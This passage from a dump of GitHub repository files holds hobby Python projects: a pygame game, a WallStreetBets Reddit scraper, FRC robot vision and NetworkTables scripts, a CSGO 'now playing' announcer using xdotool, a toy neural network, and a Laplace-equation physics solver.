self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\n\t\tif SE:\n\t\t\tself.anglemax = 136\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\tif SW:\n\t\t\tself.anglemax = 226\n\n\t\t\tif self.angle < self.anglemax:\n\t\t\t\tself.angle+=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\n\t\t\telif self.angle > self.anglemax:\n\t\t\t\tself.angle-=2\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\t\n\t\t\telif self.angle == self.anglemax:\n\t\t\t\tfenetre.blit(pygame.transform.rotate(bank[\"tile000\"], -self.angle), self.rect)\n\t\t\n\n\tdef Direction(self, touches, N,S,E,W,NE,NW,SE,SW):\n\t\tif touches[pygame.K_d]: #E\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,True,False,False,False,False,False\n\t\t\t\n\t\tif touches[pygame.K_a]: #W\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,True,False,False,False,False\n\n\t\tif touches[pygame.K_w]: #N\n\t\t\tN,S,E,W,NE,NW,SE,SW = True,False,False,False,False,False,False,False\n\t\t\t\n\t\tif touches[pygame.K_s]: #S\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,True,False,False,False,False,False,False\n\t\t\t\t\n\t\tif touches[pygame.K_w] and touches[pygame.K_a]: #NW\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,True,False,False\n\t\t\t\n\t\tif touches[pygame.K_w] and touches[pygame.K_d]: 
#NE\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,True,False,False,False\n\n\t\tif touches[pygame.K_s] and touches[pygame.K_a]: #SW\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,False,False,True\n\n\t\tif touches[pygame.K_s] and touches[pygame.K_d]: #SE\n\t\t\tN,S,E,W,NE,NW,SE,SW = False,False,False,False,False,False,True,False\n\n\t\treturn N,S,E,W,NE,NW,SE,SW\n\n\tdef enVie(self):\n\t\tif self.vie <= 0:\n\t\t\treturn False\n\t\treturn True\n\n\n\n\nfondjeu = ElementGraphique(bank[\"background\"], 0, 0)\nperso = Perso(bank[\"tile000\"], 960, 540)\t\n\nN,S,E,W,NE,NW,SE,SW = True,False,False,False,False,False,False,False\n\nhorloge = pygame.time.Clock()\ni = 0\n\nstate = 'Jeu'\ncontinuer = True\n\nwhile continuer:\n\thorloge.tick(30)\n\ti+=1\n\n\ttouches = pygame.key.get_pressed()\n\n\tif touches[pygame.K_ESCAPE] :\n\t\tcontinuer=0\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tcontinuer = 0\n\n\tif state == \"Jeu\":\n\n\t\tfondjeu.Afficher(fenetre)\n\t\tN,S,E,W,NE,NW,SE,SW = perso.Direction(touches, N,S,E,W,NE,NW,SE,SW)\n\t\tperso.Orientation(N,S,E,W,NE,NW,SE,SW)\n\t\tperso.Deplacer(touches, largeur, hauteur)\n\n\tpygame.display.update()\n\npygame.quit()" } ]
1
cludlow1/wsbDD
https://github.com/cludlow1/wsbDD
15c3673ecb8d91e85f7db1e601c9c5ff73182416
abf61fb12040b4c09d6fe1d4f230c94f0fd59fdd
6b33ed8ceacda468a668c818bc87104cc11827cf
refs/heads/main
2023-02-22T21:03:31.704547
2021-02-01T02:33:41
2021-02-01T02:33:41
324,068,775
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6650115847587585, "alphanum_fraction": 0.6732869744300842, "avg_line_length": 38.75, "blob_id": "a0a9a1b957ef952aa0d0929f954e476aeb3c2a58", "content_id": "95d6b35333266c7f2767c540368fcf8af310ef82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3021, "license_type": "no_license", "max_line_length": 150, "num_lines": 76, "path": "/goToReddit.py", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport praw\nimport requests #Pushshift accesses Reddit via an url so this is needed\nimport json #JSON manipulation\nimport csv #To Convert final table into a csv file to save to your machine\nimport time\nfrom datetime import datetime,timezone,timedelta\nfrom dateutil.relativedelta import relativedelta\n\n#allSubs is a global dictionary for all functions?\nallSubs = {}\n\ndef usingPraw(postID):\n #as of right now im only interested in the score for a given post id\n #pushshift refuses to give me an accurate score but PRAW will\n reddit = praw.Reddit(\"charles\",user_agent = \"charles_user_agent\")\n wsb = reddit.subreddit(\"wallstreetbets\")\n post = reddit.submission(id=postID)\n return post.score\n\ndef oneDayAgo():\n before = int(time.time())\n dt = datetime.now()-relativedelta(days=1)\n after= int(dt.timestamp())\n #returns timestamps in UTC not EST\n return after,before\n\ndef getPushshiftData(after,before):\n #url = 'https://api.pushshift.io/reddit/search/submission/?size=1000&after='+str(after)+'&before='+str(before)+'&subreddit='+str(\"wallstreetbets\")\n url = 'https://api.pushshift.io/reddit/search/submission/?limit=1000&after='+str(after)+'&before='+str(before)+'&subreddit='+str(\"wallstreetbets\")\n r = requests.get(url)\n data = json.loads(r.text)\n return data['data']\n\n#This function will be used to extract the key data points from each JSON result\ndef collectSubData(subm):\n #subData was created at the start to hold all the data which is then added to our global allSubs dictionary.\n subData = list() #list to store data points\n title = subm['title']\n url = subm['url']\n #flairs are not always present so we wrap in try/except\n try:\n flair = subm['link_flair_text']\n except KeyError:\n flair = \"NaN\"\n author = subm['author']\n sub_id = subm['id']\n score = subm['score']\n created = datetime.fromtimestamp(subm['created_utc']) #1520561700.0\n numComms = subm['num_comments']\n permalink = subm['permalink']\n #Put all data points into a tuple and append to subData\n subData.append((sub_id,title,url,author,score,created,numComms,permalink,flair))\n #Create a dictionary entry of current submission data and store all data related to it\n allSubs[sub_id] = subData\n\ndef filterSubs(allSubs,sub):\n subStrToList = list(allSubs[sub][0])\n if subStrToList[8] == 'DD':\n return True\n else:\n return False\n\ndef writeSubsFile():\n with open(\"output.csv\", 'w', newline='', encoding='utf-8') as file:\n a = csv.writer(file, delimiter=',')\n headers = [\"Post ID\",\"Title\",\"Url\",\"Author\",\"Score\",\"Publish Date\",\"Total No. 
of Comments\",\"Permalink\",\"Flair\"]\n a.writerow(headers)\n for sub in allSubs:\n if filterSubs(allSubs,sub):\n correctScore = usingPraw(str(sub))\n tempList = list(allSubs[sub][0])\n tempList[4] = correctScore\n a.writerow(tuple(tempList))\n else:\n pass\n" }, { "alpha_fraction": 0.6841659545898438, "alphanum_fraction": 0.6926333904266357, "avg_line_length": 30.91891860961914, "blob_id": "68d86ee48ea97f313158d99c6f7caf9db7091a01", "content_id": "22d1d911d7f9ecc1bf6a60ae94d8dd93dd7b7877", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 74, "num_lines": 37, "path": "/main.py", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "from goToReddit import *\n#from sendMail import *\n\nafter, before = oneDayAgo()\ndata = getPushshiftData(after,before)\n\n#The length of data is the number submissions (data[0], data[1] etc),\n#once it hits zero (after and before vars are the same) end\nsubCount = 0\nprint('where it started: ',after)\nwhile True:#len(data)>0:\n for submission in data:\n collectSubData(submission)\n subCount+=1\n #print(str(datetime.fromtimestamp(data[-1]['created_utc'])))\n #update after variable to last created date of submission\n after = data[-1]['created_utc']\n #data has changed due to the new after variable provided by above code\n try:\n data = getPushshiftData(after, before)\n except json.decoder.JSONDecodeError:\n time.sleep(1)\n continue\n print(subCount)\n if len(data)==0:\n print('what it stopped at: ',after)\n print('after should equal before: ',before)\n print('total number of submissions: ',subCount)\n break\n\nwriteSubsFile()\n\n\n#might be helpful\n#use batch requests to speed up praw.\n#pass it a list of fullnames to reddit.info instance\n#https://github.com/Watchful1/Sketchpad/blob/master/postDownloader.py\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 9, "blob_id": "58717228ccc6261153b32663705cb229de3104a8", "content_id": "593945752e2cd39e8cf98f631da6bd5abd5b6079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 11, "license_type": "no_license", "max_line_length": 9, "num_lines": 1, "path": "/README.md", "repo_name": "cludlow1/wsbDD", "src_encoding": "UTF-8", "text": "\"# wsbDD\" \n" } ]
3
rishabh-vasudevan/vinnovate-task
https://github.com/rishabh-vasudevan/vinnovate-task
451db5bc751f67dd5a7d08a858272e3377c1c572
d6accb6445d91c728279a444de4fea27d7076d25
cfcee8f3518e8df47d61e22aa01fe4a8efc00509
refs/heads/master
2022-11-20T11:19:05.727997
2020-07-24T11:39:38
2020-07-24T11:39:38
282,273,558
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6074073910713196, "alphanum_fraction": 0.642265796661377, "avg_line_length": 30.013513565063477, "blob_id": "1b2f92817689b1c155a2151ffe9dcf25560c9ced", "content_id": "96f1dfe467610bc3843a652c3888a3a4666cdebf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2295, "license_type": "no_license", "max_line_length": 165, "num_lines": 74, "path": "/model.py", "repo_name": "rishabh-vasudevan/vinnovate-task", "src_encoding": "UTF-8", "text": "from sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import preprocessing\nimport pandas as pd\nimport numpy as np\n\ndf = pd.read_excel('Book1.xlsx')\ndf2 = pd.read_excel('Book2.xlsx')\ndata2 = []\nfor i in range(len(df2)):\n data2.append(list(df2.iloc[i]))\ndata_set=[]\nfor i in range(len(df)):\n data_set.append(list(df.iloc[i]))\ndata=[]\nfor i in data_set:\n for j in range(1,13):\n data.append([int(i[0]),df.columns.values[j],i[j],i[13],0])\nfor i in data:\n for j in data2:\n if i[0]==j[0] and i[1]==j[1]:\n i[4]=1\n\nx = pd.DataFrame(data = data)\nx.columns =['Year','Month','Value','Total','Flood']\nlabel = preprocessing.LabelEncoder()\n\n\n# code to get the proccessed value of the months\n# k = x['Month'].unique()\n# k = label.fit_transform(k)\n# print(k) \n# month = label.fit_transform(list(x['Month']))\n\n# x['Month']=month\n# y = x['Flood']\n# x.drop(['Flood','Total'],1,inplace=True)\n# x_train,x_test,y_train,y_test = model_selection.train_test_split(x,y,test_size=0.2)\n# clf=LogisticRegression()\n# clf.fit(x_train,y_train)\n# acc = clf.score(x_test,y_test)\n# print(acc)\n# Year = int(input('Enter the Year: '))\n# Month = input('Enter the Month: ')\n# Rain = int(input('Enter mm of Rain: '))\n\n# Mon = {'JAN':4,'FEB':3,'MAR':7,'APR':0,'MAY':8,'JUN':6,'JUL':5,'AUG':1,'SEP':11,'OCT':10,'NOV':9,'DEC':2}\n# promonth = Mon[Month]\n# arr = [Year,promonth,Rain]\n# print(clf.predict([[Year,promonth,Rain]]))\n# print([[Year,promonth,Rain]])\n\n\n\nmonth = label.fit_transform(list(x['Month']))\n\nx['Month']=month\ny = x['Flood']\nx.drop(['Flood','Month','Year','Total'],1,inplace=True)\nx_train,x_test,y_train,y_test = model_selection.train_test_split(x,y,test_size=0.2)\nclf=LogisticRegression()\nclf.fit(x_train,y_train)\nacc = clf.score(x_test,y_test)\nprint(acc)\nDate = int(input('Enter the Date: '))\nMonth = input('Enter the Month(please enter in caps and only the first three letters of the month)')\nRain = int(input('Enter mm of Rain: '))\nMon = {'JAN':[4,31],'FEB':[3,28],'MAR':[7,31],'APR':[0,30],'MAY':[8,31],'JUN':[6,30],'JUL':[5,31],'AUG':[1,31],'SEP':[11,30],'OCT':[10,31],'NOV':[9,30],'DEC':[2,31]}\n\n#Assuming it will rain constantly for the rest of the month\n\nmonth_rain = (Rain/Date)*Mon[Month][1]\n\nprint(clf.predict([[month_rain]]))\n" } ]
1
GetRobbed/LazyVision2019
https://github.com/GetRobbed/LazyVision2019
df869fe3f657a838f209aacfa91579f595c15b33
2a10d0bd0a114000ecd529a8c257600cb3fa8e95
1a4571b738d0e3ad1036b0c27a3e5b4925dfa8b1
refs/heads/master
2020-04-21T21:27:36.893547
2019-02-09T15:17:59
2019-02-09T15:17:59
169,879,541
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6915636658668518, "alphanum_fraction": 0.7109081149101257, "avg_line_length": 23.486841201782227, "blob_id": "71eb987f4f6379572f47ac03d7151237b87daf37", "content_id": "1655f61d3a281bd3ec67b288b0832b147154b926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1861, "license_type": "no_license", "max_line_length": 77, "num_lines": 76, "path": "/networkTables.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "# run with python networkTables.py 10.2.19.2\n#!/usr/bin/env python3\n#\n# This is a NetworkTables client (eg, the DriverStation/coprocessor side).\n# You need to tell it the IP address of the NetworkTables server (the\n# robot or simulator).\n#\n# When running, this will continue incrementing the value 'dsTime', and the\n# value should be visible to other networktables clients and the robot.\n#\n\nimport os\nimport sys\nimport time\nimport threading\nfrom networktables import NetworkTables\n\n# To see messages from networktables, you must setup logging\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nif len(sys.argv) != 2:\n print(\"Error: specify an IP to connect to!\")\n exit(0)\nip= '10.2.19.2'\n#ip = sys.argv[1]\n\nNetworkTables.initialize(server=ip)\n\ncond = threading.Condition()\nnotified = [False]\n\ndef connectionListener(connected, info):\n print(info, '; Connected=%s' % connected)\n with cond:\n notified[0] = True\n cond.notify()\n\nNetworkTables.initialize(server=ip)\nNetworkTables.addConnectionListener(connectionListener, immediateNotify=True)\n\nwith cond:\n print(\"Waiting\")\n if not notified[0]:\n cond.wait()\n\n# Insert your processing code here\nprint(\"Connected!\")\n\n\nsd = NetworkTables.getTable(\"SmartDashboard\")\n\n\ni = 0\nwhile True:\n os.system(\"/home/pi/robo219.py\")\n #m= os.system(\"/home/pi/LazyVision.py\")\n sd.putNumber(\"slope\", os.system(\"/home/pi/LazyVision.py 1\"))\n #sd.putNumber(\"testinggucci\", 2192192219)\n #sd.putNumber(\"b\", b)\n print(\"robotTime:\", sd.getNumber(\"robotTime\", \"N/A\"))\n\n sd.putNumber(\"dsTime\", i)\n time.sleep(1)\n i += 1\n\n#table = NetworkTables.getTable('SmartDashboard')\n\n# This retrieves a boolean at /SmartDashboard/foo\n#foo = table.getBoolean('foo', True)\n\n#subtable = table.getSubTable('bar')\n\n# This retrieves /SmartDashboard/bar/baz\n#baz = table.getNumber('baz', 1)\n" }, { "alpha_fraction": 0.48685145378112793, "alphanum_fraction": 0.5241649150848389, "avg_line_length": 26.067960739135742, "blob_id": "100aef08d419ded239a5549da7be6288b0bbcf2a", "content_id": "dc07d891ab6d124529f0d0564ae9043acbd965c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2814, "license_type": "no_license", "max_line_length": 168, "num_lines": 103, "path": "/LazyVision.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "from statistics import mean\nimport PIL\nimport numpy as np\n#import *\nfrom PIL import Image, ImageFilter\n#import robo219\nchangeVal = 250\nIs=np.array([], dtype=np.float64)\nJs=np.array([], dtype=np.float64)\nm=0\nb=0\nedge = 0\nnorm = 255\ntempo = 0\n#fswebcam -r 352x288 --no-banner /home/pi/webcam/currentImage.jpg\nimage = Image.open('/home/pi/webcam/currentImage.jpg').convert('L')\npx = image.load()\n\n#image.save('/home/pi/testing123.jpg')\nwidth, height = image.size\n\nif height > 287:\n cropped = image.crop((0,69,width,height))\n tempo = 69\nelse:\n cropped = image.crop((0,0,width,height))\n 
tempo = 0\n\ncropped.save('/home/pi/webcam/currentImage.jpg')\n\n\nimgAr = np.array(cropped)\ntemp = np.array(cropped)\ndef wrongWay():\n print(imgAr[0,0])\n for i in range(0,height-tempo):\n for j in range(1,width):\n if(abs((imgAr[i,j]-imgAr[i,j-1]))>changeVal):\n temp[i,j] = edge\n else:\n temp[i,j] = norm\n print('x')\n print (imgAr[i,j])\n print (i,j)\n print (abs((imgAr[i,j]-imgAr[i,j-1])))\n im = Image.fromarray(temp)\n im.save('/home/pi/webcam/gucci.jpg')\ndef maybeWay():\n \n Iso=[]\n Jso=[]\n test = cropped.filter(ImageFilter.FIND_EDGES)\n #test.save('/home/pi/webcam/gucci.jpg')\n temp = np.array(test)\n for i in range(0,height-tempo):\n for j in range(1,width):\n if (temp[i,j]<40):\n temp[i,j] = 0\n else:\n temp[i,j] = 255\n #\n for x in range(0,width):\n temp[0,x] = 0\n temp[1,x] = 0\n #\n for i in range(1,height-tempo-1):\n for j in range(1,width-1):\n if(temp[i,j]>0):\n if(temp[i+1,j] > 0 or temp[i-1,j] > 0 or temp[i,j+1]> 0 or temp[i,j-1]> 0 or temp[i+1,j+1]> 0 or temp[i-1,j-1] or temp[i+1,j-1]> 0 or temp[i-1,j+1]> 0):\n temp[i,j] = 255\n Iso.append(i)\n Jso.append(j)\n else:\n temp[i,j] = 0\n #\n for x in range(0,width - tempo):\n temp[0,x] = 0\n temp[1,x] = 0\n #\n Is = np.asarray(Iso, dtype=np.float64)\n Js = np.asarray(Jso, dtype=np.float64)\n m= (mean(Is)*mean(Js)-mean(Js*Is))/((mean(Is)*mean(Is))-mean(Is*Is))\n b= mean(Js)-m*mean(Is)\n #\n print(m)\n print(b)\n for j in range(0,height-tempo):\n guccigang = int(m*j+b)\n if(abs(guccigang)<352):\n temp[j,guccigang]=255\n else:\n print(\"Hello World\")\n #for y in range(0,height):\n # temp[int((y-b)/m),y] = 255\n test = Image.fromarray(temp)\n test.save('/home/pi/webcam/gucci.jpg')\n #for j in range(1,width):\n # temp[m*j+b,j]\n return m\nmaybeWay()\nreturn maybeWay()\n\n#print(imgAr)\n \n \n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 25, "blob_id": "ca660cc53fb2a9a7b97ddafa1dd32554141e062e", "content_id": "3b4057b4f9b30c04d2f1b0bee66bf8792d8c6f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "no_license", "max_line_length": 64, "num_lines": 3, "path": "/robo219.py", "repo_name": "GetRobbed/LazyVision2019", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfswebcam -r 300x300 --no-banner /home/pi/webcam/currentImage.jpg\n" } ]
3
Jereck/Character
https://github.com/Jereck/Character
b1d545bebf2b523273f330cbde1979e8bc72bf06
e1152f3c08c9dcfc970f2b04808827e57b64d122
1e64ba17b41aff64be809902a1b9363a97b759fc
refs/heads/master
2021-01-01T19:52:40.124581
2017-07-29T03:32:43
2017-07-29T03:32:43
98,705,747
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.640326976776123, "alphanum_fraction": 0.6948229074478149, "avg_line_length": 20.647058486938477, "blob_id": "8cd1f70a5c16f87a7cde4208651de9ccd1960869", "content_id": "8162f3277c5e7109789bfd997f6bf104fc8af732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 367, "license_type": "no_license", "max_line_length": 37, "num_lines": 17, "path": "/sheet.py", "repo_name": "Jereck/Character", "src_encoding": "UTF-8", "text": "class Character:\n\tdef __init__(self, h, m):\n\t\tself.health = h\n\t\tself.mana = m\n\t\tprint(\"Character Created!\")\n\n\tdef take_damage(self, power, speed):\n\t\tself.damage = power * speed\n\nwarrior = Character(100, 50)\nmage = Character(50, 100)\nrogue = Character(75, 75)\npaladin = Character(80, 70)\n\nprint(warrior.take_damage)\nwarrior.take_damage(5, 8)\nprint(warrior.take_damage)" } ]
1
harrego/csgocat
https://github.com/harrego/csgocat
0cef7b6ae29c89e2405df02774dd0b122386008f
a64fb0eef685b32467dd33421201f4212a44967c
ddddb5f63efab3582b473070cab9154af60f92f5
refs/heads/master
2022-11-29T07:58:47.424098
2020-08-11T21:28:40
2020-08-11T21:28:40
286,847,118
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7571528553962708, "alphanum_fraction": 0.7620376944541931, "avg_line_length": 58.75, "blob_id": "f3c15f99ec49b9622374b63cb316ae8583acb77f", "content_id": "80b576d08175abbf0a3d6c14f98be775cb41c8ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1433, "license_type": "no_license", "max_line_length": 441, "num_lines": 24, "path": "/README.md", "repo_name": "harrego/csgocat", "src_encoding": "UTF-8", "text": "# csgocat\n\nKeep your CSGO team informed what's playing \n\n## Contributions\n\nThanks to [chxrlt](https://github.com/chxrlt) for writing all of the `mpris` and `xdotool` code!\n\n## Usage\n\n1) Install Linux, I recommend Ubuntu\n2) Install `xdotool`, `sudo apt install xdotool` on Ubuntu, `sudo pacman -S xdotool` on Arch\n3) Change `USER_JUKEBOX` in `main.py` to either `Jukebox.Rhytmbox` or `Jukebox.Spotify`\n4) Enable the console in CSGO and get into a game\n5) Run `main.py` and quickly tab back into your game, it will give you a 5 second head start\n6) When a song is about to change, stand still and let it type into your game\n\n## How it works\n\nIt uses `mpris` to determine the current song playing in either Rhythmbox or Spotify, a hash of the title and the artist is stored in `/tmp/songhash` and every second the current song is polled and compared against the cached hash. If the song has changed then `xdotool` will open the CSGO console and type `say Now playing: TITLE by ARTIST`. Before a song changes make sure you are standing still or you may type bad input into the console!\n\n## Disclaimer\n\nCSGO is a multiplayer video game with an anti-cheat. Like all applications that interact with the game it may lead to a \"cheat detection\" and get you banned. This IS NOT a cheat but it is always unknown what will trigger anti-cheat. Run this tool AT YOUR OWN RISK and I am not responsible for any action as a result of using this tool." 
}, { "alpha_fraction": 0.6313868761062622, "alphanum_fraction": 0.6358475089073181, "avg_line_length": 25.516128540039062, "blob_id": "9bde715648c300030eb07d43ed1093948351dd02", "content_id": "fb60b2c58ee333ced9cb454ad83ce8747f865a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2466, "license_type": "no_license", "max_line_length": 82, "num_lines": 93, "path": "/main.py", "repo_name": "harrego/csgocat", "src_encoding": "UTF-8", "text": "import dbus\nimport time\nimport sys\nimport os\nimport subprocess\nimport hashlib\nimport argparse\nfrom dataclasses import dataclass\nfrom enum import Enum\n\n# MARK: csgo related\n\ndef xdostring(s):\n for c in s:\n if c == \" \":\n subprocess.call([\"xdotool\", \"key\", \"space\"])\n elif c == \":\":\n subprocess.call([\"xdotool\", \"key\", \"colon\"])\n else:\n subprocess.call([\"xdotool\", \"key\", c])\n\ndef csgo_say(msg):\n subprocess.call([\"xdotool\", \"key\", \"grave\"])\n xdostring(\"say \" + msg)\n subprocess.call([\"xdotool\", \"key\", \"Return\"])\n subprocess.call([\"xdotool\", \"key\", \"grave\"])\n\ndef multiline_csgo_say(msgs):\n for msg in msgs:\n csgo_say(msg)\n time.sleep(0.5)\n\n# MARK: song related\n\nclass Jukebox(Enum):\n Spotify = \"org.mpris.MediaPlayer2.spotify\"\n Rhythmbox = \"org.mpris.MediaPlayer2.rhythmbox\"\n\nclass Song:\n def __init__(self, title, artist):\n self.title = title\n self.artist = artist\n\n def hash(self):\n song_str = f\"{self.title}/{self.artist}\".encode(\"utf-8\")\n hash_str = hashlib.sha1(song_str).hexdigest()\n return hash_str\n\n def formatted(self, jukebox):\n jukebox_str = \"\"\n if jukebox is not None:\n jukebox_str = f\" on {jukebox.name}\"\n return f\"{self.title} by {self.artist}{jukebox_str}\"\n\nSONGHASH_DIR = \"/tmp/songhash\"\nUSER_JUKEBOX = Jukebox.Spotify\n\ndef current_song(jukebox):\n session_bus = dbus.SessionBus()\n spotify_bus = session_bus.get_object(jukebox.value, \"/org/mpris/MediaPlayer2\")\n\n spotify_props = dbus.Interface(spotify_bus, \"org.freedesktop.DBus.Properties\")\n metadata = spotify_props.Get(\"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n\n return Song(metadata[\"xesam:title\"], metadata[\"xesam:artist\"][0])\n\ndef write_hash_cache(hash_str):\n with open(SONGHASH_DIR, \"w\") as name_file:\n name_file.write(hash_str)\n\ndef read_hash_cache():\n if not os.path.isfile(SONGHASH_DIR):\n return True\n with open(SONGHASH_DIR, \"r\") as hash_file:\n read_hash = hash_file.read()\n return read_hash\n\ndef song_check(song):\n new_song_hash = song.hash()\n if read_hash_cache() != new_song_hash:\n write_hash_cache(new_song_hash)\n return True\n else:\n return False\n\n# MARK: main loop\n\ntime.sleep(5)\nwhile True:\n now_playing = current_song(USER_JUKEBOX)\n if song_check(now_playing):\n csgo_say(f\"Now playing: {now_playing.formatted(USER_JUKEBOX)}\")\n time.sleep(1)\n" } ]
2
jocelyneterrazas/ChickenDinner
https://github.com/jocelyneterrazas/ChickenDinner
b39d596f1502417894e55eb93c354a083ba304c9
0df33d4957130dd0cf168fa558f26f4b568f91be
799a572e8e181f28e1114afcc66920cc60ae6166
refs/heads/master
2020-03-21T16:49:18.000734
2018-06-26T21:31:05
2018-06-26T21:31:05
138,795,341
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5800830125808716, "alphanum_fraction": 0.6082987785339355, "avg_line_length": 29.605262756347656, "blob_id": "a4e36154579922a0b3ae2054b52fd8edf6e37154", "content_id": "b06783561bd8cecd73eabc25e0a795fba968122f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 64, "num_lines": 38, "path": "/neuralNetwork.py", "repo_name": "jocelyneterrazas/ChickenDinner", "src_encoding": "UTF-8", "text": "\r\n\r\ndef evaluateNeuralNetwork(input1, weights):\r\n result = 0\r\n for i in range(len(input1)):\r\n hi = input1[i] * weights[i]\r\n #print(weights[i])\r\n result+=(hi)\r\n return round(result, 3)\r\n\r\ndef evaluateNeuralError(desired, actual):\r\n return round(desired - actual,3)\r\n\r\ndef learningFunc(input1, weights, learningRate):\r\n for i in range(len(input1)):\r\n if input1[i] > 0:\r\n weights[i]+= learningRate\r\n round(weights[i], 3)\r\n\r\ndef training(trials, input1, weights, learningRate):\r\n for i in range(trials):\r\n neuralNetResult = evaluateNeuralNetwork(input1, weights)\r\n learningFunc(input1, weights, learningRate)\r\n err = evaluateNeuralError(1, neuralNetResult)\r\n print(\"Error: \", err, \"Result: \", neuralNetResult)\r\n round(weights[2], 3)\r\n print(weights)\r\n return neuralNetResult\r\n \r\n\r\nif __name__==\"__main__\":\r\n input1 = [0,0,1,0]\r\n weights = [0,0,0,0]\r\n desiredResult = 1\r\n learningRate = 0.20\r\n trials = 6\r\n result = training(trials, input1, weights, learningRate)\r\n if (result >=1):\r\n print(\"WINNER WINNER, CHICKEN DINNER\")\r\n #evaluateNeuralNetwork(input1, weights)\r\n" } ]
1
jxw666/computationalphysics_N2015301020090
https://github.com/jxw666/computationalphysics_N2015301020090
98c906b7d7dbbf240e4c19545d8c59aa48504b60
c3ca4fd8318b4681401ea3c91111319d103e65fd
9a791ad44b3097dccba973c40b3547f25ffa3837
refs/heads/master
2021-05-15T00:29:41.950601
2018-03-09T11:46:20
2018-03-09T11:46:20
103,151,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5700934529304504, "alphanum_fraction": 0.6181575655937195, "avg_line_length": 32.04411697387695, "blob_id": "734ebb097abe391be7180f919d761f9ba63ba683", "content_id": "6cbb366a679d7c0bb118ca503ce44ba19c2b56f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2305, "license_type": "no_license", "max_line_length": 83, "num_lines": 68, "path": "/CH5/ch5.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n#1.initialize-V\ndelta=0.1\nV_old=[[0.]*(int(1+1/delta))for i in range(int(1+1/delta))]\nfor i in range(1+int(round(0.3/delta))):#int(0.3/0.1)=2\n V_old[int(round(0.3/delta))][i]=-1#借鉴上官俊怡学姐的代码,设置初值\ndeltaV=100\n#2.update-V\nwhile deltaV >=len(V_old)**2*10**(-5):\n V_new=[[0.]*len(V_old)for i in range(len(V_old))]\n for i in range(1,len(V_old)-1):\n for j in range(1,len(V_old)-1):\n V_new[i][j]=(V_old[i-1][j]+V_old[i+1][j]+V_old[i][j-1]+V_old[i][j+1])/4\n for j in range(1,len(V_old)-1):\n V_new[0][j]=(V_old[0][j-1]+V_old[0][j+1])/4\n for k in range(1,len(V_old)-1):\n V_new[k][0]=(V_old[k-1][0]+V_old[k+1][0]+2*V_old[k][1])/4\n V_new[0][0]=V_old[0][1]/2\n for l in range(1+int(round(0.3/delta))):\n V_new[int(round(0.3/delta))][l]=-1.\n b=[]\n for i in range(len(V_old)):\n a=[abs(V_old[i][j]-V_new[i][j]) for j in range(len(V_old))]\n b.append(max(a))\n deltaV=max(b)\n V_old=V_new\nN=len(V_old)#这里也借鉴了上官俊怡的代码\nV1=np.transpose(V_old)#1st Quadrant\nV3=[[0.]*(N-1) for i in range(N)]#3rd quadrant\nfor i in range(N):\n for j in range(N-1):\n 